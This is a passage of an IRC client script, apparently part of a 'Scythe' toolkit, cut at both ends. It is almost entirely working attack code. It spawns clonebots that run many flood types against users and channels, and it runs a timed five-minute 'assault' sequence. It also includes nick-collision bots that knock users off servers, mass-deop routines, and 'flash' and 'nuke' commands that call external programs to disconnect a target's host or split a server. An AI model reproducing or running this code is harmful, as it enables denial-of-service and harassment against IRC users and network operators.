$CLONESPY[$0]) != -1) {^assign SLEVS PRIVATE ${SLEVS}} if (index(P $CLONESPY[$0]) != -1) {^assign SLEVS PUBLIC ${SLEVS}} if (index(C $CLONESPY[$0]) != -1) {^assign SLEVS CTCP ${SLEVS}} ^assign FUNCTION_RETURN $SLEVS ^assign -SLEVS } } alias cshelp { sxecho +-----------+ Scythe DCC RAW Clonebot Spy Controller +-----------+ sxecho Usage: /clonespy , or sxecho /clonespy to see status. sxecho Levels: ALL(sets all levels) PUblic PRivate NOtice MOde Kick sxecho Join/leave/signoff NIck MIsc Ctcp NONE $removes all levels$ sxecho Only the letters shown capitalized are necessary. adds a sxecho level, - removes. sxecho The Misc level is for anything significant that isn't covered by sxecho the other levels. Right now this is only used for who lists. sxecho /clone who #channel' will get you a who list if you sxecho have Misc set. sxecho Be careful when flooding with spy modes set, or the clones may sxecho report the flood right back to you. sxecho +------------------------------------------------------------------+ } alias clonespy { if ([$0]) { if ([$0] == [ALL]) {/foreach CLONES VV {/clonespy $VV $1-}} { if ([$CLONES[$0]] == [ONLINE]) { if ([$1] == [ALL]) { ^assign CLONESPY[$0] PRNOKJIMC EVAL ^on ^dcc_raw "$CLONESOCKET[$0] $CLONESERV[$0] D *" {/clonespyparse $0-} } { if ([$1] == [NONE]) { ^assign CLONESPY[$0] _ EVAL ^on dcc_raw - "$CLONESOCKET[$0] $CLONESERV[$0] D *" } { ^clonespyset $0 $1 EVAL ^on ^dcc_raw "$CLONESOCKET[$0] $CLONESERV[$0] D *" {/clonespyparse $0-} } } /cecho Clone #$0 spy levels now: $cspylevs($0) } {/cecho Error: Clone #$0, no such clone.} } } {/cshelp} if ([$2]) {/clonespy $0 $2-} } alias clonespyparse.messageparse { if ([$4] == [PRIVMSG]) { if (rmatch($6- **)) { if (index(C $CLONESPY[$CN]) != -1) {/xecho -window Clones [${CN}:${CLONENICKS[$CN]}] CTCP "$strip(: $6-)" from $nickonly($strip(: $3)) to $5} } { if (rmatch($5 #*)) { if (index(P $CLONESPY[$CN]) != -1) {/xecho -window Clones [${CN}:${CLONENICKS[$CN]}] <$nickonly($strip(: $3)):$5> $strip(: $6-)} } { if (index(R $CLONESPY[$CN]) != -1) {/xecho -window Clones [${CN}:${CLONENICKS[$CN]}] *$nickonly($strip(: $3))* $strip(: $6-)} } } } if ([$4] == [NOTICE]) { if (rmatch($6- **)) { if (index(C $CLONESPY[$CN]) != -1) {/xecho -window Clones [${CN}:${CLONENICKS[$CN]}] CTCP "$strip(: $6-)" reply from $nickonly($strip(: $3))} } { if (rmatch($5 #*)) { if (index(P $CLONESPY[$CN]) != -1) {/xecho -window Clones [${CN}:${CLONENICKS[$CN]}] -$nickonly($strip(: $3)):$5\- $strip(: $6-)} } { if (index(N $CLONESPY[$CN]) != -1) {/xecho -window Clones [${CN}:${CLONENICKS[$CN]}] -$nickonly($strip(: $3))- $strip(: $6-)} } } } } alias clonespyparse { if ([$CLONES[$CLONENUM[$0]]] == [ONLINE]) { EVAL @ CN = $CLONENUM[$0] if (rmatch($3 *PING*)) {//^dcc raw $0 $1 PONG :$CLONESERV[$CN]} ^clonespyparse.messageparse $0- if ((index(I $CLONESPY[$CN]) != -1)&&([$4] == [NICK])) {/xecho -window Clones [${CN}:${CLONENICKS[$CN]}] $nickonly($strip(: $3)) is now known as $strip(: $5)} if (([$4] == [JOIN])&&(index(J $CLONESPY[$CN]) != -1)) {/xecho -window Clones [${CN}:${CLONENICKS[$CN]}] $strip(: $3) has joined channel $strip(: $5)} if (([$4] == [MODE])&&(index(O $CLONESPY[$CN]) != -1)) {/xecho -window Clones [${CN}:${CLONENICKS[$CN]}] Mode change "$strip(: $6-)" on channel $5 by $nickonly($strip(: $3))} if (([$4] == [QUIT])&&(index(J $CLONESPY[$CN]) != -1)) {/xecho -window Clones [${CN}:${CLONENICKS[$CN]}] Signoff: $nickonly($strip(: $3)) $$strip(: $5-)$} if (([$4] == [PART])&&(index(J $CLONESPY[$CN]) != -1)) {/xecho -window Clones [${CN}:${CLONENICKS[$CN]}] $nickonly($strip(: $3)) has left channel $strip(: $5)} if (([$4] == [KICK])&&(index(K $CLONESPY[$CN]) != -1)) { if ([$6] == [$CLONENICKS[$CN]]) {/xecho -window Clones [${CN}:${CLONENICKS[$CN]}] $6 has been kicked off channel $5 by $nickonly($strip(: $3)) $$strip(: $7-)$} {/xecho -window Clones [${CN}:${CLONENICKS[$CN]}] $6 has been kicked off channel $5 by $nickonly($strip(: $3)) $$strip(: $7-)$} } if (([$4] == [352])&&(index(M $CLONESPY[$CN]) != -1)) {/xecho -window Clones [${CN}:${CLONENICKS[$CN]}] $6 $10 $11 $7@$8 $$strip( $13-)$} ^assign -CN } } alias killclone { if ([$CLONES[$0]] == [ONLINE]) { //^dcc close raw $CLONESOCKET[$0] cecho Clonebot #$0 $$CLONENICKS[$0]$ disconnected. EVAL ^on dcc_raw - "$CLONESOCKET[$0] $CLONESERV[$0] D *" EVAL ^assign -CLONENUM[$CLONESOCKET[$0]] ^assign -CLONESOCKET[$0] ^assign -CLONESERV[$0] ^assign -CLONES[$0] ^assign -CLONENICKS[$0] ^assign -CLONESPY[$0] } {/cecho Error: Clone #$0, no such clone.} } alias clonesend { if ([$CLONES[$0]] == [ONLINE]) {//^dcc raw $CLONESOCKET[$0] $CLONESERV[$0] $1-} {/cecho Error: Clone #$0, no such clone.} } alias clonenick { if ([$CLONES[$0]] == [ONLINE]) { //^dcc raw $CLONESOCKET[$0] $CLONESERV[$0] NICK $1 ^assign CLONENICKS[$0] $1 } {/cecho Error: Clone #$0, no such clone.} } alias incserv { @ SERVCOUNT = SERVCOUNT + 1 if (!rmatch($CSERV[$SERVCOUNT] *.*)) {/EVAL @ SERVCOUNT = 1} } alias newclone { ^set display off if ([$0] == [RANDOM]) { /EVAL ^assign CSRV $CSERV[$SERVCOUNT] ^incserv } {/EVAL ^assign CSRV $0} EVAL ^assign CLONESOCKET[${NUMCLONES+1}] $connect($CSRV $CLONEPORT) ^set display on if ([$CLONESOCKET[${NUMCLONES+1}]] > 0) { @ NUMCLONES = NUMCLONES + 1 EVAL ^assign CLONESERV[$NUMCLONES] $CSRV if ([$CLONEUNAME] == [NONE]) {/EVAL ^assign CUN $randcrap(8)} {/EVAL ^assign CUN $CLONEUNAME} if ([$2]) {//^dcc raw $CLONESOCKET[$NUMCLONES] $CSRV USER $CUN $HOSTROOT $CSRV :$2-} {//^dcc raw $CLONESOCKET[$NUMCLONES] $CSRV USER $CUN $HOSTROOT $CSRV :$randcrap($rand(8)) $randcrap($rand(8))} if ([$1]) { if ([$1] == [RANDOM]) { EVAL ^assign JUNK2 $rand(3) if ([$JUNK2] == 0) {/EVAL ^assign CNICK $randcrap(9)} if ([$JUNK2] == 1) {/EVAL ^assign CNICK $randcrap(7)} if ([$JUNK2] == 2) {/EVAL ^assign CNICK $randcrap(5)} if ([$JUNK2] == 3) {/EVAL ^assign CNICK $randcrap(4)} ^assign -JUNK2 } {/EVAL ^assign CNICK $randcrap(1)$NUMCLONES$1} } {/EVAL ^assign CNICK $randcrap(9)} //^dcc raw $CLONESOCKET[$NUMCLONES] $CSRV NICK $CNICK //^dcc raw $CLONESOCKET[$NUMCLONES] $CSRV MODE $CNICK +i ^assign CLONENICKS[$NUMCLONES] $CNICK ^assign CLONES[$NUMCLONES] ONLINE ^assign CLONESPY[$NUMCLONES] _ EVAL @ CLONENUM[$CLONESOCKET[$NUMCLONES]] = $NUMCLONES EVAL cecho Clone #$NUMCLONES on $CSRV\ $$CNICK$ created. ^assign -CNICK ^assign -CUN } { cecho Clonebot connection to ${CSRV} failed. ^assign -CLONESOCKET[${NUMCLONES+1}] } ^assign -CSRV } alias clonewhois { ^assign FOUNDIT NO foreach CLONES XX { if ([$0] == [$CLONENICKS[$XX]]) { ^assign FOUNDIT YES cecho $0 is clonebot #$XX\, socket $CLONESOCKET[$XX]\ on server $CLONESERV[$XX]\ } } if ([$FOUNDIT] != [YES]) {/cecho Error: $0, no such clone.} ^assign -FOUNDIT } alias clonedoaction { if ([$1] == [JOIN]) { if ([$2]) { if (ischannel($2)) {/clonesend $0 JOIN $2-} {/clonesend $0 JOIN #$2-} } {/clonesend $0 JOIN $C} } if ([$1] == [LEAVE]) { if ([$2]) { if (ischannel($2)) {/clonesend $0 PART $2-} {/clonesend $0 PART #$2-} } {/clonesend $0 PART $C} } if ([$1] == [MODE]) {/clonesend $0 MODE $2 $3-} if ([$1] == [KICK]) {/clonesend $0 KICK $2 $3 :$4-} if ([$1] == [MSG]) {/clonesend $0 PRIVMSG $2 :$3-} if ([$1] == [SAY]) {/clonesend $0 PRIVMSG $C :$2-} if ([$1] == [WHO]) { if ([$2]) { if (ischannel($2)) {/clonesend $0 WHO $2-} {/clonesend $0 WHO #$2-} } {/clonesend $0 WHO $C} } if ([$1] == [CTCP]) {/clonesend $0 PRIVMSG $2 :$3-} if ([$1] == [ME]) {/clonesend $0 PRIVMSG $2 :ACTION $3-} if ([$1] == [NICK]) {/clonenick $0 $2} if ([$1] == [INVITE]) {/clonesend $0 INVITE $2 $3} if ([$1] == [NICKPREFIX]) {/clonenick $0 $2$0} if ([$1] == [TSUNAMI]) {/repeatcmd 4 clonesend $0 NOTICE $2 :$TSU} if ([$1] == [DCCTSUNAMI]) { clonesend $0 PRIVMSG $2 :DCC SEND $TSU$rand(9) $rand(9) $rand(9) clonesend $0 PRIVMSG $2 :DCC SEND $TSU$rand(9) $rand(9) $rand(9) clonesend $0 PRIVMSG $2 :DCC SEND $TSU$rand(9) $rand(9) $rand(9) clonesend $0 PRIVMSG $2 :DCC SEND $TSU$rand(9) $rand(9) $rand(9) } if ([$1] == [PONGFLOOD]) {/repeatcmd 4 EVAL /clonesend $0 PONG $TSU :$2} if ([$1] == [DCCFLOOD]) { clonesend $0 PRIVMSG $2 :DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9) clonesend $0 PRIVMSG $2 :DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9) clonesend $0 PRIVMSG $2 :DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9) clonesend $0 PRIVMSG $2 :DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9)DCC CHAT $rand(9999) $rand(9) $rand(9) $rand(9) } if ([$1] == [CTCPFLOOD]) {/repeatcmd 15 clonesend $0 PRIVMSG $2 :CLIENTINFOCLIENTINFO} if ([$1] == [PINGFLOOD]) {/repeatcmd 5 clonesend $0 PRIVMSG $2 :PINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPING} if ([$1] == [VERSIONFLOOD]) {/repeatcmd 5 clonesend $0 PRIVMSG $2 :VERSIONVERSIONVERSIONVERSIONVERSIONVERSIONVERSIONVERSIONVERSIONVERSIONVERSIONVERSIONVERSIONVERSIONVERSIONVERSIONVERSIONVERSIONVERSION} if ([$1] == [NICKFLOOD]) { EVAL ^assign TRASH1 $randcrap(2) EVAL clonesend $0 NICK $TRASH1$rand(9999999) EVAL clonesend $0 NICK $TRASH1$rand(9999999) EVAL clonesend $0 NICK $TRASH1$rand(9999999) EVAL clonesend $0 NICK $TRASH1$rand(9999999) EVAL clonesend $0 NICK $TRASH1$rand(9999999) EVAL clonesend $0 NICK $TRASH1$rand(9999999) EVAL clonesend $0 NICK $TRASH1$rand(9999999) EVAL clonesend $0 NICK $TRASH1$rand(9999999) EVAL clonesend $0 NICK $TRASH1$rand(9999999) EVAL clonesend $0 NICK $TRASH1$rand(9999999) EVAL clonesend $0 NICK $TRASH1$rand(9999999) EVAL clonesend $0 NICK $TRASH1$rand(9999999) EVAL clonesend $0 NICK $TRASH1$rand(9999999) EVAL clonesend $0 NICK $TRASH1$rand(9999999) EVAL clonenick $0 $TRASH1$rand(9999999) ^assign -TRASH1 } if ([$1] == [BOTKILL]) {/repeatcmd 20 clonesend $0 PRIVMSG $2 :help} if ([$1] == [FINGERFLOOD]) {/repeatcmd 4 clonesend $0 PRIVMSG $2 :FINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGERFINGER} if ([$1] == [RAWIRC]) {/clonesend $0 $2-} if ([$1] == [FLOOD]) {/repeatcmd 12 clonesend $0 PRIVMSG $2 :$3-} if ([$1] == [RANDNICK]) {/clonenick $0 $randcrap(9)} if ([$1] == [SEDFLOOD]) {/repeatcmd 5 clonesend $0 PRIVMSG $2 :SEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSED} if ([$1] == [JUNKFLOOD]) { EVAL ^timer $rand(25) ^clonesend $0 NOTICE $2 :$JUNKSTR EVAL ^timer $rand(25) ^clonesend $0 NOTICE $2 :$JUNKSTR EVAL ^timer $rand(25) ^clonesend $0 NOTICE $2 :$JUNKSTR EVAL ^timer $rand(25) ^clonesend $0 NOTICE $2 :$JUNKSTR EVAL ^timer $rand(25) ^clonesend $0 NOTICE $2 :$JUNKSTR } if ([$1] == [IDCCFLOOD]) {/repeatcmd 17 clonesend $0 PRIVMSG $2 :iDCC HELP} if ([$1] == [GDCCFLOOD]) {/repeatcmd 17 clonesend $0 PRIVMSG $2 :GDCC SEND #1} if ([$1] == [XDCCFLOOD]) {/repeatcmd 17 clonesend $0 PRIVMSG $2 :XDCC HELP} } alias clone { if ([$0]) { if ([$0] == [ALL]) { if ([$1] != [NICK]) { foreach CLONES XY {/clonedoaction $XY $1-} } {/cecho Error: All the bots can't change their nick to the same thing, use nickprefix.} } { if ([$0] != [HELP]) {/clonedoaction $0 $1-} {/clone} } } {/cchelp} } alias cchelp { sxecho +------------------+ Scythe Clonebot Controller +----------------+ sxecho Usage: /clone , where command is: sxecho join [] - Join a channel $or current$ sxecho leave [] - Leave a channel $or current$ sxecho mode - Do a mode change sxecho msg - Private message sxecho say - Message to current channel sxecho me - Do an action in sxecho nick - Change nickname sxecho nickprefix - Change nick using prefix system sxecho randnick - Change to a random nickname sxecho tsunami - Big, annoying flood sxecho dccflood - Tons of DCC CHAT requests sxecho ctcpflood - CTCP CLIENTINFO flood sxecho pingflood - CTCP PING flood sxecho versionflood - CTCP VERSION flood sxecho nickflood - Rapid trash nick changing sxecho botkill - Flood of 'help' sxecho fingerflood - CTCP FINGER flood sxecho rawirc - Send directly to server sxecho flood - Flood with /pause2 sxecho sedflood - [ENCRYPTED MESSAGE] flood sxecho idccflood/xdccflood/gdccflood - DCC request floods sxecho ctcp - Send CTCP sxecho invite - Invite to sxecho dcctsunami - DCC tsunami sxecho pongflood - PONG tsunami sxecho who [<#channel>] - WHO list, only works with spy sxecho level 'MISC' set. sxecho junkflood - Flood of ASCII trash sxecho Use /clonespy for setting spy levels. /clonespy for help. sxecho +-----------------------------------------------------------------+ } alias clonebots { if ([$0]) { if (match($0 STATUS CLONE KILL WHOIS WINDOW)) { if ([$0] == [WHOIS]) {/clonewhois $1} if ([$0] == [STATUS]) { ^assign CLONESON NO foreach CLONES XX { ^assign CLONESON YES cecho Clone #$XX - Socket:$CLONESOCKET[$XX] Server:$CLONESERV[$XX] Nick:$CLONENICKS[$XX] } if ([$CLONESON] == [NO]) {/cecho There are no clonebots online.} ^assign -CLONESON } if ([$0] == [CLONE]) {/EVAL repeatcmd $1 newclone $2 $3 $4-} if ([$0] == [WINDOW]) {/clone_window} if ([$0] == [KILL]) { if ([$1] == [ALL]) { foreach CLONES XZ {/killclone $XZ} @ NUMCLONES = 0 ^assign SPYSTATE OFF cecho All clonebots have been disconnected. } {/killclone $1} } } {/clonhelp} } {/clonhelp} } alias opclones { ^assign OPPEDACLONE NO foreach CLONENICKS XX { EVAL ^assign CNIX1 $CLONENICKS[$XX] ${CNIX1} } ^on ^who "*" { if ((match($1 $CNIX1))&&(!rmatch($2 *@*))) { EVAL ^assign CNIX2 $1 ${CNIX2} ^assign OPPEDACLONE YES } } ^who $C wait if ([$OPPEDACLONE] != [NO]) {/op $CNIX2} {/cecho There are no unopped clonebots on $C\.} ^on who - "*" ^assign -CNIX1 ^assign -CNIX2 ^assign -OPPEDACLONE } ### Collision Killer Bots (by Vassago and CKeeper) alias collbots {/colbots $0-} alias collbots.killons {/colbots.killons $0-} alias collbots.make {/colbots.make $0-} alias colbots {/cbots $0-} alias colbots.killons { EVAL ^on #dcc_raw 65 - "$0 $1 D % 433 *Nickname is already*" EVAL ^on #dcc_raw 65 - "$0 $1 C*" } alias colbots.make { ^set display off EVAL ^assign CBSOCKET $connect($0 $1) ^set display on if (CBSOCKET > 0) { ^assign COLLBOTS[$CBSOCKET] $2 EVAL ^on #^dcc_raw 65 "$CBSOCKET $0 D % 433 *Nickname is already*" { EVAL ^timer 2 //^dcc close raw $0 ^colbots.killons $0 $1 sxecho Collidebot $COLLBOTS[$0]: nickname already in use, disconnected ^assign -COLLBOTS[$0] ^assign -CBSERV[$0] } EVAL ^on #^dcc_raw 65 "$CBSOCKET $0 C*" { ^colbots.killons $0 $1 sxecho Collidebot $COLLBOTS[$0] has been disconnected by server $1. ^assign -COLLBOTS[$0] ^assign -CBSERV[$0] } //^dcc raw $CBSOCKET $0 NICK $2 //^dcc raw $CBSOCKET $0 USER $randcrap(8) $HOSTROOT $0 :$CJUNKSTR sxecho Collidebot $2 created on server $0 $Socket: $CBSOCKET$ ^assign CBSERV[$CBSOCKET] $0 ^assign -CBSOCKET } {/sxecho Error connecting Collidebot $2 to server $0.} } alias colbots.help { sxecho +-----------------+ Scythe Nick Collision Bots Help +------------------+ sxecho Usage: /CBOTS , where is: sxecho make [] - Create a single Collidebot. sxecho kill [] - Kill Collidebot or ALL. sxecho list - List Collidebots online. sxecho dupeops [] - Like dupe, but only gets ops. sxecho newnick - Change a Collidebot's nick. sxecho dupe [] - Duplicate all nicks on your sxecho channel but you on . sxecho The following two commands are used in conjunction: sxecho find - Finds lagged servers and adds sxecho them to your collide server list, sxecho which is used in DESTROY. sxecho destroy [] - Attempts to collision kill sxecho . If is specified sxecho it will use that server. If not, sxecho CBOTS will create a collision bot sxecho on every server in the collide sxecho server list. sxecho +----------------------------------------------------------------------+ sxecho If is left out with any of these, the default is 6667. If sxecho is left out with kill, it disconnects all your Collidebots. sxecho +----------------------------------------------------------------------+ } alias cbots { if (match($0 MAKE FIND DESTROY KILL DUPE DUPEOPS LIST NEWNICK)) { if ([$0] == [NEWNICK]) { if ([$2]) { ^assign CHANGEDONE N foreach COLLBOTS XX { if ([$COLLBOTS[$XX]] == [$1]) { //^dcc raw $XX $CBSERV[$XX] NICK $2 ^assign COLLBOTS[$XX] $2 ^assign CHANGEDONE Y } } if ([$CHANGEDONE] == [N]) {/sxecho $1: no Collidebots match that nick} ^assign -CHANGEDONE } {/sxecho Usage: /CBOTS newnick } } if ([$0] == [MAKE]) { if ([$2]) { if ([$3] > 0) {^assign MPORT $3} {^assign MPORT 6667} ^colbots.make $2 $MPORT $1 ^assign -MPORT } {/sxecho Usage: /CBOTS make []} } if ([$0] == [KILL]) { if ([$1]) { ^assign KILLEDONE N foreach COLLBOTS XX { if ([$COLLBOTS[$XX]] == [$1]) { //^dcc close raw $XX ^colbots.killons $XX $CBSERV[$XX] sxecho Collidebot $COLLBOTS[$XX] disconnected. ^assign -COLLBOTS[$XX] ^assign -CBSERV[$XX] ^assign KILLEDONE Y } } if ([$KILLEDONE] == [N]) {/sxecho $1: No Collidebots match that nick.} ^assign -KILLEDONE } { foreach COLLBOTS XY {^cbots kill $COLLBOTS[$XY]} sxecho All Collidebots have been disconnected. } } if ([$0] == [DUPE]) { if ([$1]) {/_dodupe} {/sxecho Usage: /CBOTS dupe [].} } if ([$0] == [DUPEOPS]) { if ([$1]) { ^on ^who "*" { if (([$1] != [$N])&&([$1] != [$GBNICK])) { ^assign KILLNIX[$rand(9999999)] $1 } } sxecho Duplicating all channel ops on $C via server $1. ^who -chops * wait ^on who - "*" foreach KILLNIX XT { ^cbots make $KILLNIX[$XT] $1- ^assign -KILLNIX[$XT] } } {/sxecho Usage: /CBOTS dupeops []} } if ([$0]==[LIST]) {/_listbots} if ([$0]==[FIND]) {/_findservs} if ([$0]==[DESTROY]) { ^assign -destroyserv ^assign destroyport 6667 if ([$3]) { ^assign destroyserv $2 ^assign destroyport $3- } if ([$2]) {^assign destroyserv $2} if ([$1]) { if ([$SERV[0]]==[]) {/_getservs} if ([$destroyserv]==[]) { sxecho Creating collide bots for $1 on $cservnum servers, please wait... _botsmake $1- } { sxecho Creating collide bot on server $2-, please wait... _botsmake2 } } {/sxecho Usage: /CBOTS DESTROY []} } } {/colbots.help} } alias _getservs { purge serv @ cservnum = 0 foreach CSERV XX { ^assign serv[$XX] $CSERV[$XX] @ cservnum = cservnum + 1 } } alias _botsmake { foreach serv XX { sxecho Connecting to server $serv[$XX]\... ^assign servp[$XX] $connect($serv[$XX] 6667) if (servp[$XX] > 0) { ^on ^dcc_raw "% % D % 433 % % :*" {^timer 5 //^dcc raw $0 $1 NICK $6} //^dcc raw $servp[$XX] $serv[$XX] NICK $1 //^dcc raw $servp[$XX] $serv[$XX] USER $tolower($randcrap(9999999)) # # :*Unknown* EVAL ^timer 60 _closeraw $servp[$XX] $serv[$XX] } } } alias _botsmake2 { sxecho Connecting to server $destroyserv\... ^assign dserv $connect($destroyserv $destroyport) ^on ^dcc_raw "% % D % 433 % % :*" {^timer 5 //^dcc raw $0 $1 NICK $6} //^dcc raw $dserv $destroyserv NICK $1 //^dcc raw $dserv $destroyserv USER $tolower($randcrap(9999999)) # # :*Unknown* EVAL ^timer 60 _closeraw $dserv $destroyserv } alias _dodupe { ^on ^who "*" { if ([$1] != [$N]) {^assign KILLNIX[$rand(9999999)] $1} } sxecho Duplicating all nicknames on $C on server $1. ^who * wait ^on who - "*" foreach KILLNIX XT { ^cbots make $KILLNIX[$XT] $1- ^assign -KILLNIX[$XT] } } alias _listbots { ^assign IHAVEBOTZ N foreach COLLBOTS XX { sxecho $COLLBOTS[$XX] on server $CBSERV[$XX] $Socket: $XX$ ^assign IHAVEBOTZ Y } if ([$IHAVEBOTZ] == [N]) {/sxecho You have no Collidebots online.} ^assign -IHAVEBOTZ } alias _findservs { sxecho Finding lagged servers and adding them to your DESTROY list... purge serv _getservs ^on ^364 "*" if (([$3]>[9])&&(!rmatch($1 ?.*))) { sxecho Added server $1 to DESTROY list of $cservnum\ servers. ^assign serv[$cservnum] $1 @ cservnum = cservnum + 1 } //links wait -CMD ^on 364 - "*" } alias _closeraw { //^dcc raw $0 $1 QUIT :Leaving ^on dcc_raw - "% % D % 433 % % :*" sxecho Connection closed $Raw socket $0 to $1$ } ### Clonebot Assault Program alias assault { if ([$0]) { /sxecho Beginning 5 minute clonebot assault sequence on $0. @ numtouse = [$"[S/X] Number of clonebots to use : "] if ([$numtouse]!=[]) {/sxecho Using $numtouse clonebots\.} { @ numtouse = 3 sxecho Using default number of $numtouse clonebots. } @ assaultserver = [$"[S/X] Server to use : "] if ([$assaultserver]!=[]) {/sxecho Using server $assaultserver for the assault.} {/sxecho Clonebots will be spawned on random servers. @ assaultserver = [random]} @ assaultdesc = [$"[S/X] IRCNAME for the bots : "] if ([$assaultdesc]!=[]) {/sxecho Using IRCNAME $assaultdesc for the clonebots.} @ defaultnick = [$"[S/X] Default nick prefix for the bots : "] if ([$defaultnick]!=[]) {/sxecho Using $defaultnick for the clonebots.} { ^assign defaultnick RANDOM /sxecho Using random junk nick for the clonebots. } /sxecho Assault program engaged on $0\, please wait... EVAL /clonebots clone $numtouse $assaultserver $defaultnick $assaultdesc wait if (rmatch($0 #*)) {/clone ALL join $0;wait} /sxecho Engaging flood sequence on $0. /clone all junkflood $0 ^timer 50 /clone all sedflood $0 ^timer 75 /clone all multiflood $0 ^timer 100 /clone all versionflood $0 ^timer 125 /clone all randnick ^timer 150 /clone all pingflood $0 ^timer 175 /clone all randnick ^timer 200 /clone all tsunami $0 ^timer 240 /clone all tsunami $0 ^timer 300 /clonebots kill all /sleep 1 /sxecho Assault program on $0 in progress. ALL clonebots will be /sxecho automatically disconnected in five minutes. } {/sxecho Usage: /ASSAULT <#channel/nick>.} } ### Megadeop with Nick Change alias nickmdop { EVAL ^assign OLDNICK $N ^on ^who "*" { if ([$1]!=[$N]) { if (rmatch($2 *@*)) { ^assign mdopz $1 ${mdopz} } } } ^who * /wait /listmdopnicks $mdopz ^assign -mdopz EVAL //nick $OLDNICK ^assign -OLDNICK ^on who - "*" } alias listmdopnicks { quote MODE $C -oooo $0 $1 $2 $3 quote NICK _$rand(99999999) if ([$4]) {/listmdopnicks $4-} } ### Flash & Nuke Commands alias flash { if ([$0]) { Userhost $0 -CMD if ([$3]) { if ([$4]!=[]) { ^exec $flash_pgm $strip(#;~ $3)@$4 & ^exec $flash_pgm $strip(#;~ $3)@$4 & sxecho Flashed $0 $$strip(#;~ $3)@$4$ } {/sxecho I can't find $0 on IRC.} } } {/sxecho Usage: /FLASH .} } alias mflash { if ([$0]) { Userhost $0 -CMD if ([$3]) { if ([$4]!=[]) { ^exec $mflash_pgm cs.bu.edu loser@kiss.my.ass.edu $strip(;#~ $3)@$4 sxecho Mail flashed $0 $$strip(;#~ $3)@$4$. } {/sxecho I can't find $0 on IRC.} } } {/sxecho Usage: /MFLASH .} } alias listmassflash { ^exec -name flash $flash_pgm $1 wait %flash sxecho I have flashed $0 $$1$ if ([$2]) {^listmassflash $2-} } alias massflash { ^on ^who "*" { if ([$1]!=[$N]) {^assign FLASHLOSERS $1 $strip(;#~ $3)@$4 ${FLASHLOSERS}} } ^who $C wait -CMD nextflash } alias nextflash { ^on who - "*" ^listmassflash $FLASHLOSERS ^assign -FLASHLOSERS } alias nuke { if ([$0]) { ^on ^311 "*" {^assign ndomain $3} ^on ^312 "*" {^assign nserver $1} ^on ^319 "*" # ^whois $0 wait EVAL ^exec $nuke_pgm $ndomain $nserver unreach & EVAL ^exec $nuke_pgm $nserver $ndomain unreach & /sxecho Sent nuke for $0 at $ndomain on server $nserver\. ^on 311 - "*" ^on 312 - "*" ^on 319 - "*" ^assign -ndomain ^assign -nserver } {/sxecho Usage: /NUKE . You must have root access to use.} } # Server Nuke (by Vassago) alias snuke { if ([$0]) { ^assign nserver1 $0 ^on ^364 "*" { if (rmatch($2 ?.*)) { sxecho Invalid server name $2. sxecho Enter a valid server name that matches that mask: ^assign nukeprompt $word(0 $"$2 is also: ") ^assign nserver2 $nukeprompt ^assign -nukeprompt } {^assign nserver2 $2} } //links $0 wait -CMD # if ([$nserver2] != []) { EVAL ^exec $nuke_pgm $nserver1 $nserver2 unreach & EVAL ^exec $nuke_pgm $nserver2 $nserver1 unreach & wait EVAL ^exec $nuke_pgm $nserver1 $nserver2 unreach & EVAL ^exec $nuke_pgm $nserver2 $nserver1 unreach & } {/sxecho Error: uplink to $nserver1\ not found.} sxecho Sent nuke to $nserver1\ and $nserver2\. ^on 364 - "*" ^assign -nserver1 ^assign -nserver2 } { /sxecho Usage: /SNUKE . You cannot be on the same server /sxecho as the server you are trying to nuke! This command will /sxecho double-nuke the server. You must have root access to use. } } ### Yet Another Flood Alias alias flood { if ([$0]) { if ([$1]) {^assign SR $1} {^assign SR $S} if ([$2]) {^assign PT $2} {^assign PT 6667} ^set input_prompt Flooding $0... ^set display off sxecho Creating connections... $using server ${SR}, port $PT$ EVAL ^assign FB[0] $connect($SR $PT) EVAL ^assign FB[1] $connect($SR $PT) EVAL ^assign FB[2] $connect($SR $PT) ^set display on if ((FB[0] > 0)&&(FB[2] > 0)) { sxecho Signing on... ^dcc raw $FB[0] $SR NICK $randcrap(9) ^dcc raw $FB[1] $SR NICK $randcrap(9) ^dcc raw $FB[2] $SR NICK $randcrap(9) ^dcc raw $FB[0] $SR USER $randcrap(8) $HOSTROOT $SR :$CJUNKSTR ^dcc raw $FB[1] $SR USER $randcrap(8) $HOSTROOT $SR :$CJUNKSTR ^dcc raw $FB[2] $SR USER $randcrap(8) $HOSTROOT $SR :$CJUNKSTR sleep 2 sxecho Flooding... (connections will die when flooding is finished). sleep 3 if (ischannel($0)) { ^dcc raw $FB[0] $SR JOIN $0 ^dcc raw $FB[1] $SR JOIN $0 ^dcc raw $FB[2] $SR JOIN $0 } foreach FB XX { EVAL ^timer 3 ^dcc raw $FB[$XX] $SR NOTICE $0 :$JUNKSTR EVAL ^timer 6 